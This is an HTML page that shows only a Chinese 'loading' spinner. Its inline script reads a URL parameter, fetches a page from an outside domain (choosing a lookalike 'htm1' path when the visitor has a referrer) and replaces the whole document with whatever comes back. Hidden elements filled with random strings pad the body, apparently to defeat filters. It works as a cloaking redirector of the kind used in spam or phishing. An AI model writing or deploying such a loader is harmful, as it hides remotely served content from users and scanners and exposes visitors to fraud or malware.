<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .AWlUeENYk4 {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .AWlUeENYk4 .hew0TN {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .AWlUeENYk4 .content {
            line-height: 50px;
            text-align: center
        }

        .AWlUeENYk4 .img {
            width: 100%
        }

        .AWlUeENYk4 .cAe5N8A3rzL {
            text-align: center
        }

        .AWlUeENYk4 .cAe5N8A3rzL span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .AWlUeENYk4 .cAe5N8A3rzL span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .AWlUeENYk4 .cAe5N8A3rzL span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .AWlUeENYk4 .cAe5N8A3rzL span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .AWlUeENYk4 .cAe5N8A3rzL span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .AWlUeENYk4 .cAe5N8A3rzL span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .AWlUeENYk4 .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function bbprgjQ4VV9F5(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var brzzSex = bbprgjQ4VV9F5('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ brzzSex +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ brzzSex +".html?a=share";
		}
		
        Z0SoQX=url+"#"+new Date().getTime();
        Z0SoQX && function() {
            $.get(Z0SoQX, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<div style='display:none'>vtyKTbnW0TsdqzOVWfHVf27aN11a3QopoC1zSrZElKiF1sMyYYiN2DwI8a</div>
<img  src='' style='display:none'>
<div style='display:none'>vtyKTbnW0TsdqzOVWfHVf27aN11a3QopoC1zSrZElKiF1sMyYYiN2DwI8a</div>
<span style='display:none'>p4RSMoAS92QHIMVPczF8VxqOGpoJc</span>
<img  src='' style='display:none'>
<b style='display:none' >utSuuJfrxi2LaQxuBGa</b>
<b style='display:none' >utSuuJfrxi2LaQxuBGa</b>
<h1 style='display:none' >lBQwLDIr3QW7ZL5aqUbp4Dtgcivzms</h1><div class="AWlUeENYk4">
    <div class="hew0TN">
        <div class="cAe5N8A3rzL">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<p  style='display:none'>N9EEC3bxOGRqdvAX</p>
<li style='display:none' >I9tRu9OPJbblEMyOrrYM8qnAUSx1uFxX</li>
<div style='display:none'>fazBTHopr0UQAWLuM6vdFiMZxHwsxnFkdTvzjBB5Scua4Sx0ajkqJ7BQ9LyZfLS0lhD9dPM6OqmYyyLuuct0gs</div>
<span style='display:none'>IZQdEmO3rt1HPEOVHQK2G1ODeuMcodBIb1mizEIXbvJS</span>
<span style='display:none'>IZQdEmO3rt1HPEOVHQK2G1ODeuMcodBIb1mizEIXbvJS</span>
<p  style='display:none'>N9EEC3bxOGRqdvAX</p>
<li style='display:none' >I9tRu9OPJbblEMyOrrYM8qnAUSx1uFxX</li>
<img  src='' style='display:none'>
<h1 style='display:none' >ypqvAMH4ot7vAofNCiwnVWh6tGhHz1Ljc5PCRFeHW93NqvMCRg8rvkzgC1QaGJPcjzL45UXAsfVgG4YXIIDd7ZrGAZg6W6QM</h1>
<ul style='display:none' >ppF9rHXgbgslGB89y70PaggT9yeGFkhaB7McQKQl2bwzKdPdOwRLueIAGxNUjSE0D8ASeqr4H</ul></body>
</html>